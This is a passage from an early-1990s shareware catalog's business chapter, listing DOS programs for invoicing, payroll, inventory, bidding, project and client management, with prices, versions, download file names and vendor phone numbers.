Inc., 407-291-3960 + Registration: $75.00 + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOBI.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge). + Download size: 345k + Description: + Permits you to invoice your products while keeping an accurate + record of all your 'sales'. Features include: Multiuser (ie: + Novell), Registers, Quote Interface, Templates, Back Orders, + Cash Drawers, Packing/Shipping Lists, Labels, Sales Graphs, + Special Pricing, Tax Codes, Terms Codes, Credit Limits, + Passwords, MRP interface, Multiple Prices, and many Reports. + Very similar to DAYO POS, and uses the same manual. + + Chapter 8, "Business" 187 + + + + Product: FAST INVOICE WRITER + Needs: IBM PC, DOS 2.1 or better. Dot matrix, LaserJet, or Epson + JX-80 color printer. + Author: H&P Software, 719-561-0810 + Registration: $39.95 + Version: 4.91 (07-23-91) + User benefits: Printed manual and latest version. + Look for: FAST-INV (multiple files) on BBSs (call 719-561-0810 to + download it at no charge). + Download size: 285k + Description: + Calculates and prints invoices on plain 8-1/2 x 11 inch paper. + Handles discounts, deposits, P.O. numbers, clerks initials, + type of sale, and account numbers. Does both taxable and non- + taxable sales on same sheet. Included are city, state, and a + third user-definable tax. Serial numbers are automatically + incremented. Letterhead is printed at top. Can do 3-colored + invoices. MULTIFILE-XL can be used as an external customer or + parts database. Accepts foreign dates and monetary symbols. + Does summary. + + Product: FAST STATEMENT WRITER + Needs: IBM PC, DOS 2.1 or better. + Author: H&P Software, 719-561-0810 + Registration: $29.95 + Version: 4.1 (07-11-91) + User benefits: Printed manual and latest program version. + Look for: FAST-STA (multiple files) on BBSs. + Download size: 128k + Description: + Calculates and prints monthly statements in row-column format + on plain 8-1/2 x 11 inch paper. Prints your letterhead at the + top along with copy numbering. 999 sequential statements can + be printed when data files are named 'CUST.001' thru + 'CUST.999'. Supports IBM & TANDY dot matrix, or laser printers. + Prints disclosure statement. Prints sorted or numbered summary + of accounts. Full line editing is provided on string inputs. + Does all calculations. + + Product: FASTFILE + Laptop database for business, school, home. See full + description on page 141. + + Product: Home Sales System + Avon(tm) Billing & Ordering program. See full description on + page 211. + + Product: Painless Accounting + Full feature 11 module accounting system! See full description + on page 174. + + Chapter 8, "Business" 188 + + + + Product: PC-AR Accounts Receivable + Needs: IBM PC, DOS 2.1 or better. + Author: Medlin Accounting Shareware, 707-255-4475 + Registration: $35.00 + Version: 4.1 (01-01-92) + User benefits: Phone support, bonus utilities. 20% discount on + first forms order from NEBS. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP in IBMAPP forum LIB 5 on CompuServe; + MEDLIN.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 237k + Description: + A fast, simple accounts receivable and sales summary program to + get the bills out. Contains many powerful features such as + auto billing, late charges, aging and alpha account numbers. + Reports include plain paper or pre printed statements, accounts + receivable ledger, charges and payments listing, sales summary + (with or without detail), customer activity report, mailing + labels and ageing report. Inactive customers may be omitted + from most reports. Up to 8000 customers and invoices per + month. + + Product: Qanalyst + Phone bill analyzer for people who use Qmodem. See full + description on page 166. + + Product: Rosewood Journal + Invoice Journal and Accounts Receivable. See full description + on page 177. + + Product: Systems Manager + Reports time by client, purpose & application. See full + description on page 201. + + Product: Takin' Care of Business! AP + TCB Accounts Payable program. See full description on + page 178. + + Product: Takin' Care of Business! AR + TCB Accounts Receivable program. See full description on + page 178. + + Product: Takin' Care of Business! GL + TCB General Ledger program. See full description on page 179. + + Product: Takin' Care of Business! IN + TCB Inventory program. See full description on page 179. + + Product: Takin' Care of Business! M&C + TCB Main and Configuration programs. See full description on + page 180. + + Product: Takin' Care of Business! PR + TCB Payroll program. See full description on page 180. + + Chapter 8, "Business" 189 + + + + Product: Takin' Care of Business! PS + TCB Point Of Sale program. See full description on page 181. + + Product: Time is Money + Needs: IBM PC, DOS 2.1 or better. + Author: Custom Data Solutions + Registration: $95.00 + Version: 2.2 (07-20-91) + User benefits: Source code, printed manual and disks, free + support. + Look for: availability unknown on BBSs; TIM22.ZIP in CONSULT + forum LIB 4 on CompuServe. + Download size: 240k + Description: + A time and expense billing program that completely automates + the generation of invoices for a time or fixed fee business of + any kind. It maintains records of receivables, and will print + statements if desired. Written in the dBASE language and + compiled with the Clipper compiler. Source code is available + to registered users, as is a FoxPro version. Ideal for + consultants, attorneys, accountants, and other professionals. + + Product: TimeStax + Needs: IBM PC, DOS 2.1 or better. + Author: Johnson Technologies, 408-255-4213 + Registration: $49.95 + Version: 2.5a (02-01-91) + User benefits: First major upgrade is free to registered users; + support via phone/fax/Compuserve. + Look for: TMSTAX*.ZIP on BBSs (call 317-856-2087 to download it + at no charge); TMSTAX.ZIP in IBMAPP forum LIB 6 on CompuServe. + Download size: 112k + Description: + The Personal Timecard Manager. A LAN-aware time management + tool for consultants, contractors, managers, office workers - + in short, anyone who has a need to know how their time is + spent. Lets you record all activity by Date, Client, Project, + and Task for any number of employees. It features 8-line + notes, an automatic activity timer, 5 levels of subtotal + reporting, popup windows, import/export utilities, and a smooth + user interface. + + Product: TimeTrac + Time & Expense tracking; TSR, Export, LANs. See full + description on page 196. + + Product: Tolman Dental Program [***] + Dental Office Managment Program. See full description on + page 203. + + Chapter 8, "Business" 190 + + + + 8.1.4 Purchase order systems + + Product: Painless Accounting + Full feature 11 module accounting system! See full description + on page 174. + + Product: The Retailer + A multi-center inventory control system. See full description + on page 195. + + 8.1.5 Payroll systems + + Product: DAYO PAYROLL + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $65.00 + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOYE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOYE.ZIP in IBMAPP forum LIB 5 on CompuServe. + Download size: 320k + Description: + Provides a system for the computation of payroll for businesses + of any size. Features include: Multiuser, unlimited employees, + Weekly, BiWeekly, and/or Monthly payrolls, quarterly, year to + date (YTD), and current summary databases, Automatic payroll + posting & computation, vacation, sick pay/days, check printing, + multiple states, SDI tax, overtime & premium hourly wages, up + to 8 deductions, view reports on screen, medicare and many + reports. + + Product: Painless Acct/Payroll Companion + Custom Graph/Report/Export Program. See full description on + page 175. + + Product: Painless Payroll + Needs: IBM PC, DOS 2.1 or better. 640k RAM, hard disk. + Author: Painless Accounting, 800-521-9905 + Registration: $75.00 + Version: 1.08 (05-27-91) + User benefits: Latest copy of the software along with a print + manual in a 3 ring binder. Also receive major discounts on + updates. + Look for: PAP*.ARC (multiple files) on BBSs (call 214-881-0313 to + download it at no charge); PAP*.ARC in IBMAPP forum LIB 5 + (multiple files) on CompuServe; PAP*.ARC in IBM RTC LIB 3 + (multiple files) on GEnie. + Download size: 300k + Description: + A full feature payroll system. Modules include: Generation, + Reports, Files, and Closing. Support Federal and all 50 states + tax tables. Generates payroll for Salary, Hourly, Commissions, + and Base plus Commission. Also contains support of Allotments, + + Chapter 8, "Business" 191 + + + + Child Support, Departmentalization. Prints numerous reports + including W2s and 1099s. Context Sensitive Help, easy + installation and automatically interfaces with Painless + Accounting 5.0. + + Product: PC-PR Payroll Writing + Needs: IBM PC, DOS 2.1 or better. Printer with a condensed-print + mode. + Author: Medlin Accounting Shareware, 707-255-4475 + Registration: $35.00 + Version: 2.1 (02-01-92) + User benefits: Phone support, current federal/state tax tables. + 20% discount on first check order from NEBS. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP in IBMAPP forum LIB 5 on CompuServe; + MEDLIN.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 237k + Special instructions: Product distribution restricted to the + United States. + Description: + A fast, simple payroll writing program. 1992 federal tax + tables and most state tax tables are included. Employees are + automatically sorted in alphabetical order. Allows up to five + deductions per check for 1000 employees. + + Reports include employee listing (can be used as payroll input + sheet), federal liability by paydate, quarterly payroll + listing, payroll ledger, payroll check listing, employee + history report and annual W-2's. Supports tips, cafeteria + plans and 401K plans. + + Product: Takin' Care of Business! AP + TCB Accounts Payable program. See full description on + page 178. + + Product: Takin' Care of Business! AR + TCB Accounts Receivable program. See full description on + page 178. + + Product: Takin' Care of Business! GL + TCB General Ledger program. See full description on page 179. + + Product: Takin' Care of Business! IN + TCB Inventory program. See full description on page 179. + + Product: Takin' Care of Business! M&C + TCB Main and Configuration programs. See full description on + page 180. + + Product: Takin' Care of Business! PR + TCB Payroll program. See full description on page 180. + + Product: Takin' Care of Business! PS + TCB Point Of Sale program. See full description on page 181. + + Chapter 8, "Business" 192 + + + + Product: ZPAY 3 + Needs: IBM PC, DOS 2.0 or better. 375k RAM, hard disk, printer. + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Registration: $69.95 + Version: 3.4 (01-12-92) + User benefits: Printed manual, master disks, one year mail + support, 900# phone support. + Look for: ZPAY3*.ZIP (multiple files) on BBSs; ZPAY3*.ZIP in + IBMAPP forum LIB 5 (multiple files) on CompuServe; ZPAY3*.ZIP + in IBMPC RTC LIB 0 (multiple files) on GEnie. + Download size: 604k + Special instructions: Product distribution restricted to the + United States. + Description: + The easiest to use and most flexible payroll package for the PC + ever! Pays salaried, hourly, commissioned, 1099 type payments + by any pay period. Prints checks, W2's and a multitude of + reports. Has data exporting so you can manipulate the data + with other applications such as a spreadsheet program. Supports + laser printers as well as your pin feed printers. Manual has a + "test ride" tutorial to make learning a snap! + + + 8.2 Inventory systems + + Product: DAYO BAR CODE 3 OF 9 + Needs: IBM PC, DOS 3.3 or better. 450k RAM; Hard Disk; DAYO + Inventory. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $45.00 + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed and + disk), Phone Support. + Look for: DAYO39.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYO39.ZIP in IBMAPP forum LIB 6 on CompuServe. + Download size: 300k + Description: + Prints 3 of 9 bar codes with an Epson (tm) or IBM (tm) + compatible dot matrix printer. It is integrated with the DAYO + Inventory and the DAYO Customer databases. Labels are printed + onto standard labels (3.5 by 15/16 inches at 6 lines per inch). + The inventory bar code label consists of an item number, its + bar code, vendor item number, description, unit of issue, + weight, and bin/location. The customer bar code label consists + of a customer number, its bar code, customer's name and + telephone. + + Chapter 8, "Business" 193 + + + + Product: DAYO END OF PERIOD + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk; DAYO + Inventory. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $50.00 + Version: 3.0 (06-24-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOEE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOEE.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOEE.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 320k + Description: + Contains routines that are normally run at the end of a + reporting period (ie: Month). Permits you to permanently remove + deleted records from the Accounts Receivable (AR) and Accounts + Payable (AP) databases, and to erase old report text files. + There is also a routine for performing a Physical Inventory. + Many reports are included (ie: AR Ageing, AP Summary, Inventory + Movement). + + Product: DAYO INVENTORY + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $65.00 + Version: 3.1 (06-27-91) + User benefits: Multiuser, No record limits, Manual (printed and + disk), Phone Support. + Look for: DAYOIE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOIE.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOIE.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 280k + Description: + A Multiuser Inventory Control, Purchasing, and Vendor + Maintenance application. Use it to create and maintain an + inventory of any product. Features include Multiuser (ie: + Novell, LANtastic), Reports, Labels, Lists, and a Graph. The + ability to upgrade and expand your system is available with the + addition of supporting DAYO products (ie: DAYO POS, DAYO AR, + DAYO AP, etc.). + + Chapter 8, "Business" 194 + + + + Product: DAYO MRP + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $75.00 + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed or + disk), Phone Support. + Look for: DAYOWE.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge); DAYOWE.ZIP in IBMAPP forum LIB 6 + (multiple files) on CompuServe. + Download size: 340k + Description: + A routine designed for manufacturers. Builds items (End Items) + from item (Components) in the inventory database. End Items can + later be placed into inventory for later sales. Supports multi- + level Bill of Materials. Features include automatic inventory + posting and creation of inventory adjustment records, databases + are dBASE(tm) compatible, multiuser, and many reports. + + Product: DAYO RETURN MANAGEMENT SYSTEM + Needs: IBM PC, DOS 3.3 or better. 520K RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $45.00 + Version: 2.0 (05-01-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOFE.EXE on BBSs (call 407-292-4921 to download it at + no charge). + Download size: 320k + Description: + Provide the means to record and track returns of your product. + DAYO RMS integrates to DAYO Inventory and its multiple + warehouses to allow tracking of items being returned (ie: + breakages, warranties, return to vendors). Creates RMA numbers. + + Product: Household Register + Home/Office inventory program. See full description on + page 321. + + Product: ICP + Needs: IBM PC, DOS 3.3 or better. + Author: Spirit7 Software, Ltd., 703-943-4635 + Registration: $35.00 + Version: 7.0 (02-01-92) + User benefits: Master disks, unlimited phone/fax support, + utilities. + Look for: ICP.ZIP on BBSs; ICP70.ZIP in IBMAPP forum LIB 6 on + CompuServe. + Download size: 225k + Description: + A full-featured, general purpose inventory control system with + modules to sell, order, and receive inventory. The system + features complex filtering (segmenting) of the data base by + using the "and/or" logical operators. Records can be quickly + + Chapter 8, "Business" 195 + + + + located by the item number, description, vendor, manufacturer + or by browsing the data basae or a restricted segment. New + records are easily added using "record pattern templates". Many + usefull reports are available. + + Product: Layout + Needs: IBM PC, DOS 2.0 or better. CGA monitor; IBM/Epson FX or + HP LaserJet printer. + Author: Software Co-op, 317-856-6052 + Registration: $35.00 + Version: 2.0 (06-01-91) + User benefits: Printed manual, BBS/phone/mail support, disk with + latest version, notice of upgrades. + Look for: LAYOUT.ZIP on BBSs (call 317-856-2087 to download it at + no charge); LAYOUT.ZIP in IBMAPP forum LIB 5 on CompuServe. + Download size: 140k + Description: + Keeps graphics layout of office furniture and equipment by room + and a database objects, each with 6 free-form fields. Multiple + rooms can be grouped together to form units such as + departmental charge areas. + + Inventory reports and export of data to comma-delimited files + for transfer to database programs or spreadsheets. Data entry + is via a mini-CAD system. Makes nice printed room layouts. + Solid system without a lot of frills. Appeals to the office + manager with rolled up sleeves. + + Product: The Retailer + Needs: IBM PC, DOS 2.1 or better. Hard disk. + Author: RetailWare, 405-749-1763 + Registration: $49.00 + Version: 4.05 (12-19-91) + User benefits: Current disk set sent with printed manual. + Look for: RET405.ZIP on BBSs (call 405-755-7047 to download it at + no charge); RET405.ZIP in IMBAPP forum LIB 6 on CompuServe. + Download size: 280k + Description: + Inventory control for merchants with up to 5 stores selling + similar products. Menu and on-line help. Not POS, but + "backroom" system for central buying office. Min/Max stock + levels may be recalculated automatically. Multiple vendors: up + to 10,000 items each. Input sales from sales slips or physical + inventory in an order-form or on-the-shelf sequence you define. + Identifies best sellers. Five year monthly sales history, by + item & store. Bar charts. Printer redirection. Prints price + tags. Tutorial. + + + 8.3 Equipment use & maintenance + + Product: Chris's Automobile Recorder [***] + Vehicle Operation & Maint. Logger & Reminder. See full + description on page 351. + + Chapter 8, "Business" 196 + + + + 8.4 Project bidding & costing + + Product: ProDev*EPRICE + Needs: IBM PC, DOS 2.0 or better. ProDev*QUOTE software. Up to + 24MB of hard disk for large data files. + Author: Pro Dev Software, 616-788-2243 + Registration: $35.00 + Version: 4.10 (05-01-91) + User benefits: One year technical support. + Look for: availability unknown on BBSs; PDQUT3.EXE in IBMAPP + forum LIB 15 on CompuServe. + Download size: 245k + Description: + Provides for converting weekly price service data files for + electrical, heating, plumbing and air conditioning items to the + ProDev*QUOTE file format to automatically update material + prices. Includes sample files for 3 USA, 1 Australian and 1 UK + price service. The user subscribes separately to the desired + price service. + + Product: ProDev*QUOTE + Needs: IBM PC, DOS 2.0 or better. Hard disk recommended. + Author: Pro Dev Software, 616-788-2243 + Registration: $45.00 + Version: 4.10p (05-01-91) + User benefits: One year technical support. + Look for: availability unknown on BBSs; PDQUT1.EXE in IBMAPP + forum LIB 15 (multiple files) on CompuServe. + Download size: 320k + Description: + Packed with features for ANY type/size business from + consultants to 1 person contractors to small/large + manufacturers. Used by many electrical, heating, plumbing, + remodeling, major construction contractors, florists, flooring + stores, landscape contractors, printing shops, maintenance + services, well . . . just about any type business. The system + defaults are highly configurable. Pull-Down menus, Point & + Shoot Browse and F1 Help windows. + + Product: ProDev*QUOTE Utility Programs + Needs: IBM PC, DOS 2.0 or better. ProDev*QUOTE software. Hard + disk recommended. + Author: Pro Dev Software, 616-788-2243 + Registration: $30.00 + Version: 4.10p (05-01-91) + User benefits: One year technical support. + Look for: availability unknown on BBSs; PDQUT2.EXE in IBMAPP + forum LIB 15 on CompuServe. + Download size: 306k + Description: + Browse program to quickly browse and edit all ProDev*QUOTE bid + system data files. Tracking program will freeze bid prices and + allow posting and comparison reporting of actual project costs. + These are add-on programs to the ProDev*QUOTE program. + + Chapter 8, "Business" 197 + + + + Product: TimeTrac + Needs: IBM PC, DOS 3.0 or better. + Author: Compass / New England, 603-431 8030 + Registration: $50.00 + Version: 91f (06-01-91) + User benefits: Printed manual, most recent version, phone/mail/ + CIS support. + Look for: TT91F.* on BBSs (call 603-433 1859 to download it at no + charge); TT91F.EXE in IBMAPP forum LIB 6 on CompuServe; + TT91F.LZH in IBMPC RTC LIB 3 on GEnie. + Download size: 162k + Description: + Automates time sheets and aids project tracking & billing. + Allows individuals in a workgroup to track their use of time + while in the field on laptop computers and then export the + information to accounting, project tracking, spreadsheet and + database programs. Includes an optional (6k) TSR that allows + users to "pop" a timesheet over text or graphics programs to + keep track of actual time used. TimeTrac works equally well at + the office on a Local Area Network. + + 8.4.1 Decision analysis tools + + Product: NEWBIZ [***] + Brainstorming Program to set up own business. See full + description on page 131. + + Product: UDECIDE [***] + Needs: IBM PC, DOS 2.1 or better. + Author: Cascoly Software, 206-523-6135 + Registration: $30.00 + Version: 1.05 (04-20-91) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; UDCIDE.ZIP in IBMAPP + forum LIB 7 on CompuServe. + Download size: 100k + Description: + Helps you make decisions such as which software or hardware to + purchase; ratings surveys; which project to pursue; selecting + colleges, movies, stocks, or wines. You enter a list of + elements to evaluate the contenders, giving each a weight. Then + you enter the options, assigning values to each element. Then + sort to obtain an ordered list of the best options. Or perform + what-if analyses by changing elements or weights. + + Chapter 8, "Business" 198 + + + + 8.5 Project management + + Product: Business Plan Master (IBM) [***] + Needs: IBM PC, DOS 3.0 or better. Word Processing or Page Layout + program plus a Lotus or compatible spreadsheet program. + Author: Grand Universal, 303-756-2175 + Registration: $34.00 + Version: 1.2 (03-21-92) + User benefits: Most recent version, minimum three months support + via online services, one free upgrade. + Look for: availability unknown on BBSs; BIZPLA.ZIP in USEN forum + LIB 12 on CompuServe; BIZPLANM.ZIP in HOSB RTC LIB 5 on GEnie. + Download size: 152k + Description: + Every business needs a BUSINESS PLAN - Fortune 500 or Mom & + Pop. Business Plan Master makes it easy for you to write a + complete business plan. Most of the work is already done for + you. Select the text you want from these formatted templates. + Enter your projections and the spreadsheets generate full + financial reports and analysis (income statement, balance + sheet, cash flow, ratios, etc.). + + Save days of work and have a comprehensive business plan to + chart your company's growth! + + Product: Business Plan Master (Mac) [***] + Needs: Unknown. Needs Macintosh word processing or page layout + program plus a spreadsheet program. + Author: Grand Universal, 303-756-2175 + Registration: $34.00 + Version: 1.2 (03-25-92) + User benefits: Disk with most recent version, minimum three + months support via the online services, one free upgrade. + Look for: availability unknown on BBSs; BIZPLA.SIT in USEN forum + LIB 12 on CompuServe; BIZPLANM.SIT in HOSB RTC LIB 5 on GEnie. + Download size: 230k + Description: + Every business needs a BUSINESS PLAN - Fortune 500 or Mom & + Pop. Business Plan Master makes it easy for you to write a + complete business plan. Most of the work is already done for + you. Select the text you want from these formatted templates. + Enter your projections and the spreadsheets generate full + financial reports and analysis (income statement, balance + sheet, cash flow, ratios, etc.). + + Save days of work and ahve a comprehensive business plan to + chart your company's growth! + + Product: Calendar Keeper + Calendar Database/Draw Program. See full description on + page 77. + + Chapter 8, "Business" 199 + + + + Product: Calendar Wise [***] + Multi-Subject Planner, Desktop Calendar. See full description + on page 78. + + Product: Chris's Automobile Recorder [***] + Vehicle Operation & Maint. Logger & Reminder. See full + description on page 351. + + Product: Early Bird + Great Full-Featured Reminder/Calendar Program. See full + description on page 79. + + Product: Easy Project + Needs: IBM PC, DOS 3.3 or better. 512k RAM; hard disk. + Author: Parcell Software, 708-232-6328 + Registration: $59.00 + Version: 4.02 (05-01-91) + User benefits: Latest version sent with printed manual. Special + BBS access given and all registered users notified of updates. + Look for: EZPROJ.EXE on BBSs (call 708-232-6339 to download it at + no charge); EZPROJ.EXE in IBMAPP forum LIB 6 on CompuServe. + Download size: 180k + Description: + A tool to manage all types of projects and an alternative to + complex and expensive project management systems. Featues + Gantt charts detailing planned vs. actual progress, extensive + reporting, and automatic scheduling. Multiple date formats are + supported for use by managers all over the world. Utilizes .DBF + files to make data transfer to other programs easy. + + Product: InContext + DOS shell+, based on principles of human work. See full + description on page 106. + + Product: WorkQueue + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: Lane Davis + Registration: $40.00 + Version: 1.9 (12-02-91) + User benefits: Latest version without the 'unlicensed' message. + Look for: availability unknown on BBSs; WQ19*.ZIP in IBMAPP forum + LIB 6 (multiple files) on CompuServe. + Download size: 220k + Special instructions: Product distribution restricted to the + United States. + Description: + Uses a Staff Plan, Work Plan and Holiday Schedule to calculate + a work schedule for up to 25 people and 1000 tasks over two + years. The availability of staff, their skills, types of work + and task dependencies are used to determine start and end dates + as well as durations. It uses easy, full-screen spreadsheet- + style data entry screens and avoids specialized terminology and + concepts. The Operating instructions, User's Guide and Glossary + are on-line and context-sensitive. + + Chapter 8, "Business" 200 + + + + 8.6 Client management + + Product: DAYO BAR CODE 3 OF 9 + Print 3 of 9 barcodes onto Epson/IBM printer. See full + description on page 192. + + Product: DAYO MEMBERSHIP + Needs: IBM PC, DOS 3.3 or better. 500K RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $95.00 + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYODE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYODE.ZIP in IBMAPP forum LIB 9 on CompuServe. + Download size: 320k + Description: + An application designed to track membership for an association + or organization. The ability to maintain records for donations, + dues, payments and/or invoices has also been incorporated into + the package. Use it to record member information and + optionally, maintain a simple accounting system for dues and/or + donations. Many reports and reporting routines are included in + this package, ie: Members List, Notes, Statements, Labels, + Payments, Form Letters and much more. + + Product: Early Bird + Great Full-Featured Reminder/Calendar Program. See full + description on page 79. + + Product: FASTFILE + Laptop database for business, school, home. See full + description on page 141. + + Product: FlexBase + Needs: IBM PC, DOS 3.3 or better. Hard disk. 80286 recommended. + Author: National MicroSystems, 416-599-1228 + Registration: $49.95 + Version: 1.0 (11-20-91) + User benefits: Printed manual, unlimited phone support. + Look for: availability unknown on BBSs; FB.ZIP in IBMAPP forum + LIB 3 on CompuServe. + Download size: 170k + Description: + An easy to use database system for recording information about + people. You define what fields you want and the layout of the + screen. The program then integrates it all automatically. + + Once you have added your people, you can filter them to show + only the ones you want. Now create custom reports, letters, + and labels using our built in editor and lookup-tables. Print + them out or save the templates for later use. No system has + ever been so easy to use, with so many advenced features. + + Chapter 8, "Business" 201 + + + + Product: Hotnet + The Help Desk Solution. See full description on page 166. + + Product: Japanese Business Culture [***] + Japanese Business Culture Kit. See full description on + page 209. + + Product: NAMEBASE [***] + Needs: IBM PC, DOS 2.1 or better. + Author: Elk Creek Software, 303-838-5796 + Registration: $25.00 + Version: 3.1 (03-26-92) + User benefits: Printed manual, master disks. + Look for: NAME30.ZIP on BBSs; NAME31.ZIP in IBMSYS forum LIB 7 on + CompuServe. + Download size: 170k + Description: + Keeps track of people and companies. Stores 4 phone numbers, 2 + addresses, 2 dates, and up to 2000 characters of notes for each + record. Full mouse support. Prints a pocket-size address + book, labels, Rolodex cards, and reports. Creates mail-merge + files for use with most word processors. Dials the phone. + Displays multiple records at once. Extremely easy to use. Type + the first few characters of any person's name and you are + immediately viewing all information about that person. + + Product: Names & Dates + Address Book, Calendar, Mailing Label combo. See full + description on page 88. + + Product: Service Business Design [***] + Needs: IBM PC, DOS 3.3 or better. VGA monitor. Mouse + recommended. + Author: Niche Software, 714-892-9052 + Registration: $5.00 + Version: 1.1 (03-23-92) + User benefits: Mail support. + Look for: WORK.ZIP on BBSs (call 714-636-2667 to download it at + no charge). + Download size: 200k + Description: + Use this program to score your organization's performance in + the service sector. Find out mistakes commonly made in service + delivery; inspire your staff with service philosophies of + famous people; design better service delivery to retain + personnel and boost profits. Customize the lessons by altering + the scrolled text files. This electronic lecture reads like a + magazine with selections determined by menu. Features + animation,graphics,music. + + Chapter 8, "Business" 202 + + + + Product: Systems Manager + Needs: IBM PC, DOS 2.1 or better. Hard disk. + Author: MiCord, 517-631-4367 + Registration: $10.00 + Version: 2.5 (02-10-91) + User benefits: Master disks, free support, upgrade discounts. + Look for: SYSMGX.EXE on BBSs; SYSMGX.EXE in IBMAPP forum LIB 7 on + CompuServe. + Download size: 135k + Description: + Automatically tracks usage by time, date, client, purpose, user + and software type from an integrated point-and-shoot menu for + your software or DOS commands. Sorted reports prepared + automatically for client billing, tax or business records. + Friendly enough for beginners with the capabilities advanced + users want. Features include user selection of all tracking + options, password protection, screen colors, screen title, and + time/date formats. + + + 8.7 Specific-field systems + + Product: PARTY TRACKER + Needs: IBM PC, DOS 2.0 or better. + Author: Robert Barrentine, 301-490-7104 + Registration: $75.00 + Version: 1.0 (02-01-92) + User benefits: Master disks, mail support, limited phone support. + Look for: PARTRK.ZIP on BBSs; PARTRK.ZIP in IBMAPP forum LIB 7 on + CompuServe. + Download size: 227k + Special instructions: Product distribution restricted to the + United States. + Description: + This Political Party Membership and Financial Records System + will accept, maintain, and report on the membership roles and + financial contributions received by an organized Political + Organization or Committee. The following reports can be pro- + duced: Customized Membership Rosters,Telephone List, Individual + Contributions Report, Report of Contributions Income, and a + Report of Contributor Donations. Mailing labels are produced + for all entries in the system. + + 8.7.1 Medical & dental + + Product: KWIKSTAT + Statistical Data Analysis. See full description on page 255. + + Chapter 8, "Business" 203 + + + + Product: LEANER + Needs: IBM PC, DOS 2.0 or better. Hard disk and EGA monitor + recommended. + Author: MoonStone Software, 602-955-4266 + Registration: $35.00 + Version: 1.52 (10-10-91) + User benefits: Printed manual, master disks, phone/mail/BBS/ + newsletter support. Discount offers. + Look for: LEAN152.EXE on BBSs (call 602-235-9653 to download it + at no charge); LEAN15.EXE in GOODHEALTH forum LIB 10 on + CompuServe; LEAN101.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 240k + Description: + For health organizations, weight control clinics and corporate + employee programs. Handles multiple groups. Insures privacy + for personal charts. Includes your own weight loss strategies. + + Keep the fat fires burning, give LEANER to your clients for + home use. Graphs, reports, charts and reviews track progress. + Calculates aerobic exercise points. Estimates body fat. + Assesses health risks. Discovers your eating style. A wide + range of techniques to help shape a healthy, leaner lifestyle. + + Product: ORGANIZE! Professional Books [***] + Cataloging system for professional books. See full description + on page 204. + + Product: Tolman Dental Program [***] + Needs: IBM PC, DOS 2.0 or better. Hard disk. + Author: Peter T. Smith D.D.S., 516-281-5544 + Registration: $599.00 + Version: 3.1 (03-01-92) + User benefits: Set of data files, at least six months or six + hours of phone support. + Look for: TOLMAN#.ZIP (multiple files) on BBSs; TOLMN*.ZIP in + DBADVISOR forum LIB 8 (multiple files) on CompuServe; + TOLMAN#.ZIP in DATABASE RTC LIB 4 (multiple files) on GEnie. + Download size: 480k + Special instructions: Product distribution restricted to the + United States. + Description: + This CompuServe Magazine (DEC 91) pick as a "Current Hit," is + an efficient management program for a mid-size dental office. + Though inexpensive it is NOT incomplete. It will handle + billing, recalls, insurance, referral tracking, a variety of + patient lists, production reports, mail merge and more. With + online help, look-up windows and a User's Manual, the program + is easy to learn. The program was used/improved in the + dentist/author's office for 4 years before release. + + Chapter 8, "Business" 204 + + + + 8.7.2 Real estate + + Product: ACCEL + Compares various accelerated payment methods. See full + description on page 220. + + Product: DIMANAGE + Needs: IBM PC, DOS 2.0 or better. + Author: DI Management Corporation, 513-831-4122 + Registration: $99.00 + Version: 2.1 (06-14-91) + User benefits: Printed manual, master disks. + Look for: availability unknown on BBSs; DIMANA.EXE in IBMAPP + forum LIB 15 on CompuServe. + Download size: 256k + Special instructions: Product distribution restricted to the + United States. + Description: + A rental property management system designed for speed and ease + of use. Use it to manage as many properties, with as many + units, as your hard disk and your patience will tolerate. The + assumption is that managers want to manage property, not do + accounting. The system was designed to make record keeping as + simple as possible, while giving fast access to the money and + tenant information the property manager and the accountant + need. Sample data provided. + + Product: THE MORTGAGE MISER + Mortgage loan modeling tool. See full description on page 225. + + 8.7.3 Library + + Product: ORGANIZE! Professional Books [***] + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, support, + updates, bonus utilities. + Look for: PROBK527.ZIP on BBSs. + Download size: 300k + Description: + 